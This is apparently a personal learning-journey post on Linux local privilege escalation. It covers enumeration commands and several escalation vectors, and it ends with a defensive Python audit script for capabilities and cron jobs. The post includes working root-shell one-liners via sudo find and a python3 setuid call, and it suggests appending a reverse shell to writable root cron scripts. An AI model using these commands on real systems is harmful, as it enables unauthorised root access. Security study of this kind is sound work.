Day 14 of my #1HourADayJourney. Today, I consolidated everything I've learned about Linux Local Privilege Escalation. When an attacker gains initial access, the next mission is always the same: Find the path to Root.
🛠️ The Enumeration Checklist
Before trying any exploits, an auditor must perform rapid enumeration. These are the 4 commands that often reveal the "Golden Ticket" to root:
# 1. Check Sudo privileges
sudo -l
# 2. Search for SUID binaries
find / -perm -4000 2>/dev/null
# 3. Check for Linux Capabilities
getcap -r / 2>/dev/null
# 4. Inspect Cron Jobs
cat /etc/crontab
🔓 Top Privilege Escalation Vectors
1. Sudo & GTFOBins
Some binaries are designed to launch other programs or drop into a shell. If a user can run find via sudo without a password, they can execute:
sudo find . -exec /bin/bash \; -quit
Always reference GTFOBins to see if a binary has an "escape to shell" function.
2. Writable Scripts in Cron/Services
If a root-owned process runs a script that is writable by your user or group, it's game over. The Exploit: simply append /bin/bash or a reverse shell payload to the script and wait for the system to execute it as root.
3. Linux Capabilities (The Modern Vector)
Capabilities like cap_setuid+ep on a binary like Python allow it to manipulate UIDs. Exploit:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
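To turn checklist items 3 and 4 and vectors 2 and 3 into something an auditor can run repeatedly, here is an added example (my own code, not from the original post) that parses getcap output for identity-changing capabilities and checks whether root cron jobs point at group- or world-writable targets. The risky-capability set and the interpreter list are assumptions for the example.

```python
"""Defender-side audit for checks 3 and 4 above (added example, not the post's code).
Parsers take command output as text so they run on samples; audit_host() runs them live."""
import os, re, stat, subprocess

# Capabilities that change identity or bypass file permissions (assumed risky set).
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_sys_admin"}
INTERPRETERS = ("python", "perl", "ruby", "node", "php")  # cap + interpreter = root shell
CAP_LINE = re.compile(r"^(\S+)\s*=?\s*(\S+)$")  # "/p cap_setuid=ep" or "/p = cap_setuid+ep"
ABS_PATH = re.compile(r"(?<!\S)(/[\w./-]+)")    # first absolute path in a cron command

def flag_capabilities(getcap_output: str) -> list[str]:
    """'path: caps' per binary with a risky capability; interpreters get a '!! ' prefix."""
    findings = []
    for line in getcap_output.splitlines():
        m = CAP_LINE.match(line.strip())
        if not m:
            continue
        path, caps = m.groups()
        hits = sorted(c for c in RISKY_CAPS if c in caps)
        if hits:
            mark = "!! " if any(i in os.path.basename(path) for i in INTERPRETERS) else ""
            findings.append(f"{mark}{path}: {','.join(hits)}")
    return findings

def cron_jobs(crontab_text: str) -> list[tuple[str, str]]:
    """(user, path) per /etc/crontab job (m h dom mon dow user command); blank,
    comment and VAR=value lines are skipped."""
    jobs = []
    for line in crontab_text.splitlines():
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[0].startswith("#") or "=" in fields[0]:
            continue
        m = ABS_PATH.search(fields[6])
        if m:
            jobs.append((fields[5], m.group(1)))
    return jobs

def is_writable_by_others(mode: int) -> bool:
    """Group- or world-writable: a root job on such a target hands root to its editors."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_host() -> list[str]:
    """Run both checks on the live host (needs libcap's getcap) and return findings."""
    caps = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout
    findings = flag_capabilities(caps)
    jobs = cron_jobs(open("/etc/crontab").read()) if os.path.exists("/etc/crontab") else []
    for user, path in jobs:
        if user == "root" and os.path.exists(path) and is_writable_by_others(os.stat(path).st_mode):
            findings.append(f"!! root cron target {path} is group/world writable")
    return findings
```

Call audit_host() on the box under review; anything prefixed "!!" is a finding to fix (drop the capability or tighten the file mode) before an attacker finds it.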
Follow my journey: #1HourADayJourney